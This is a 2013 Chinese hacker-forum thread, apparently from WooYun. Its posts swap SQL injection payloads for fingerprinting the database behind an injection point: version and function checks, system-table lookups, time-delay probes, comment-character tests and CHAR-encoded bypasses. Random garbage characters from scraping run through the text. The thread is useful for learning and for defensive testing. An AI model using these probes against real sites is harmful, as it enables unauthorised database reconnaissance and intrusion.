一个注射点如何最快速确认是什么类型数据库$ P, ~+ O" `9 g2 g6 G
xsser (十根阳具有长短!!) | 2013-02-05 12:36
2 v2 c( ^; U1 O. C假设这么一个注射点:
4 S+ G W7 s1 Fshow.html?id=2
. x. \# A( k; B) g5 z6 Xmysql:id=2 and version()>0
0 n( s( M& u3 Y: o. voracle:id=2 and '1'||'1'='11& B& R2 n; o: E) t
其他的欢迎补充
+ t& h5 T6 e. \. B; n2 q1#
, _$ V ]% j- ~$ u, v- K3 _" P' {6 z% iupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 12:47
( y8 d1 N* _$ q- o5 w! M, n" tAccess:0 W# R/ S( b5 Y$ a: q
aNd aSc(cHr(97))=97
' w4 x. r6 o- v, @$ |and exists(select id from MSysAccessObjects)
9 @6 F! e! T. {1 r6 h. ]SQL Server:0 L; q S" V7 O
and exists(select id from sysobjects)
% C) I9 n) b4 M" }2 m' kand length(user)>0
p9 y3 r' Q3 ^ @MySQL:+ o7 S8 ]1 t& ? O" _
and length(user())>08 N! y' M" H m1 j' Q# R
2#
) V$ W: J2 t. \1 X* U& bxsser (十根阳具有长短!!) | 2013-02-05 12:485 {$ ^* t8 m; o9 e7 R
@upload 如果这些都不是呢…
, W7 k% ]( i) f/ j' V7 `. u$ S) o3#
( v. v) Z9 K6 v3 dupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:03# x: j& d! G2 I! h7 Y1 k: }
@xsser 不快速的,延时注入( L6 }' L8 m+ L1 O" i
不知道这样写对不对3 N' V4 h; b1 P; z* |
mssql:id=2 and IF(ascii(SUBSTRING('name',1,1))>0)waitfor delay'0:00:3'4 X& g+ e/ o8 s* J
mysql:id=2 and select benchmark(1e8,current_date());
( W4 q( i% O" s2 j6 k$ {% Z4 R4#" L% K/ D" g7 ]
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:10$ Q% J; {: t b; {* {0 U1 E$ t5 i
最快的貌似是看报错信息1 J! v+ G; Y g- S4 C
oracle error
' I) k+ F7 P7 Y: Z2 {, Lmssql error
: x. ~2 f0 b, o& C/ y8 L! [" s# O2 cmysql error+ a7 u0 n! |- q& S" l, k3 O
5#
6 G: d4 Z+ _ L; g6 LNimda (你们都是坏银~) | 2013-02-05 13:14
: K/ c/ n+ ~1 Q9 d8 K0 F: N, Z小菜献丑来一发 Oracle:id=2 and 0<>(select count(*) from dual)
6 t5 h+ P, ?0 v3 F6#
2 g' R# S, e- Y# c5 {* \- k! p) nupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:21, p: H3 J- {# O
“/*”是MySQL中的注释符,返回错误说明该注入点不是MySQL,继续提交如下查询字符:1 j. l8 r' c: I& _; z$ w$ Y
“–”是Oracle和MSSQL支持的注释符,如果返回正常,则说明为这两种数据库类型之一。继续提交如下查询字符:* Y) G. m% J, o4 R9 x% Q- ~
“;”是子句查询标识符,Oracle不支持多行查询,因此如果返回错误,则说明很可能是Oracle数据库。
! m3 x: k/ Y; a* i1 H7#
% d6 V+ y$ W b" N! n_Evil (HackEnd) | 2013-02-05 13:335 ~6 T6 l) D: a) a
PostgreSQL
2 ^5 E* [. j8 _5 H% B8#
' ~6 r& p) \( U. hupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:42
1 x4 V4 w3 Q, M' f: A切换编码 and 1=1! f7 T+ Q% f1 S! C# m
oracle:
9 t. s0 M8 v- n4 I w( d) L/ HCHR(97) || CHR(110) || CHR(100) || CHR(32) || CHR(49) || CHR(61) || CHR(49)- q( }4 i# ^8 S; _
mssql:/ j3 [- |* t3 I9 }6 J' `& V0 ]
CHAR(97) + CHAR(110) + CHAR(100) + CHAR(32) + CHAR(49) + CHAR(61) + CHAR(49)( m1 ~8 b! R% F- W3 W9 M: M3 y9 N$ o
mysql:
* g$ p2 \. c; a! z! vCHAR(97, 110, 100, 32, 49, 61, 49)3 ^# O+ q$ J" r9 B. G, E
9#0 I: m; M) u- ?
xsser (十根阳具有长短!!) | 2013-02-05 14:31
4 m/ f4 l6 a6 B! t@upload 比较常见的数据库这些还是可以判断的,但是还有其他奇葩类型的呢?
5 y! D5 q( w+ o; O% D6 } [2 e' S10#
' h+ g J/ D( Wupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 14:469 @& _0 {1 d8 V
@xsser 是奇葩数据库类型的么?
2 W1 w) l5 I+ U. f+ W! ~% K根据注入的原理,我们可以猜想,要成功的注入,必须使得注入后的一片和谐,那么使用该类数据库特性来判断,综上所述:! E' H9 E' G4 p4 M o* d: Y
1.是否可以使用特定的函数来判断,该数据库特有的4 J8 p& o; U5 A3 `; R
2.是否可以使用辅助的符号来判断,如注释符号、多语句查询符等等
r$ N9 S. v5 j. M- D8 X$ O, }3.是否可以编码查询
5 ^5 n! P% T0 Z9 ], C3 ]4.是否显可以利用错信息. m* ?* B& A$ U8 {. P/ B
5.是否存在数据库某些特性辅助判断: ?4 }% V3 P# Q# v
个人见解/ W$ F1 ]. f& l$ d+ Y2 N. P
11#& ]* N3 P ~3 J4 e8 [- o2 |
小胖子 (z7y壮士,来,干了这碗酒!) | 2013-02-05 14:552 _. K7 u9 a' n5 `
已收藏,mssql可以直接看到错误提示的吧~( N% _7 ? O9 D* q" j+ w
12#
- t4 B9 K8 C0 YPasser_by | 2013-02-05 15:09
5 X6 m! s% n! k' q曾被 @GaRY 面过我这题。。。紧张了。。后来回家sqlmap判断注射点的时候抓包看了下。。。一抓包全出来了居然。。
# B+ L! l- M/ B; Q+ k; pfrom:http://zone.wooyun.org/content/260 |
发表于 2013-2-11 09:54:04
收藏
支持
反对